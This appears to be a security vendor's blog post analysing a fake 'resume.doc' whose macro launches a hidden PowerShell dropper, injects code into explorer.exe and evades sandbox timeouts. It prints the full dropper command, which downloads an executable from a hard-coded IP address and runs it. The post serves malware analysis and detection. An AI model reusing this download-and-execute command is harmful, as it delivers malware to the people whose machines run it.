Blog

VMRay Analyzer Identifies Resume Containing Evasive Malware

Recently, we received a seemingly innocuous job application with an attached Word document called “resume.doc”. Let’s take a closer look at the malicious behavior embedded in this fake resume.

Malware Embedded in CV
Figure 1: Incoming Job Application E-mail with Malicious Attachment “resume.doc”.

Upon uploading the Word doc into VMRay Analyzer, the signature was sent to our built-in reputation service, where the file hash was queried against known malicious and known benign files. In this case, there were no hits and the file was classified as “unknown”, so we proceeded to dynamically analyze the file.  After detonating it for analysis on several different Windows 7 environments, we deemed the file as “Malicious” as it received the highest possible VTI (VMRay Threat Identifier) Score of 100/100 (Figure 2).

VTI Score - CV Malware
Figure 2: “resume.doc” classified as “unknown” by the built-in reputation service.

To understand the score, let’s take a deeper dive into the observed behavior of the file (Figure 3):

VMRay Analyzer Observed Behavior - CV Malware
Figure 3: Detailed look at the observed behavior from “resume.doc”.

Starting from the VTI by Score view, we can get a high-level view of the file’s behavior.  The first two entries of the Detected Threats table suggest that the file engages in code injection, modifying the memory and control flow of several processes including “explorer.exe”. This is a common malware technique to embed the code in live memory of a known good process that would typically be running anyway on a Windows machine.

In the third entry, we see the malware has set up a server to accept incoming network connections, probably from a C&C (command and control) server. Further along in the VTI Information, we can see that a PE (portable executable) is dropped and executed on the machine. The file “29546.exe” is a known malicious file. It’s important to note that a VBA macro was executed, triggered by a user choosing to ‘enable editing’ through social engineering. A macro isn’t in and of itself suspicious but often a necessary condition for compromise of the target machine.

Finally, it’s important to note that a VBA macro was executed, triggered by a user choosing to ‘enable editing’ through social engineering. A macro isn’t in and of itself suspicious but often a necessary condition for compromise of the target machine.

Now let’s look at the process graph to get a better understanding of the sequence of events (Figure 4).

Process Tree - CV Malware
Figure 4: Malware creates a Powershell process that drops a PE file and executes it.

From winword.exe, the malware creates a powershell process in a hidden window, which drops the aforementioned PE file and executes it.

Create process "powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls =
'http:\185.165.29.36\google.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process 
$path;break;}catch{write-host $_.Exception.Message;}}

It is from this PE file that most of the malicious behavior is exhibited, escalating privileges and injecting code into explorer.exe, which in turn creates and injects code into many new malicious processes and facilitates much of the suspicious network traffic, performing over 7000 network operations across the 13 threads.

Taking a look at the Involved Hosts map, we can get a high-level visual of the remote connections and network activity (Figure 5).

Network Activity - CV Malware
Figure 5: High-Level look at remote connections made by the malware

Figure 6 lists the domains, IP addresses, country, and protocol for all network activity initiated by the malware. Connections are established with remote hosts across the US and EMEA by this particular sample, and in the first row, we can see the malware connect to a domain called “myexternalip.com” to perform geolocation, a technique often used by targeted context-aware malware.

Network Connections - CV Malware
Figure 6: Connections established across the US & EMEA

Throughout execution, the malware attempts to evade VMRay Analyzer’s detection by making several sleep function calls to exploit a natural shortcoming of automated systems: an analysis timeout. However, VMRay Analyzer detects this sandbox evasion tactic and truncates the total sleep time in order to monitor the true functionality of the malware before the default timeout of 2 minutes (Figure 7).

Sandbox Evasion Technique - CV Malware
Figure 7: VMRay Analyzer truncates sandbox evasion technique used by the malware

By now, I am sure most of you have seen an example of malware that stems from a Word document via an embedded macro. While it is not a new or creative method of infection, it remains an effective way of packaging and deploying known malicious files such as the PE dropped and executed during this analysis.  Overall, despite the malware author’s best effort, the resume document is exposed for its malicious behavior by VMRay Analyzer.

View the Full Malware Analysis Report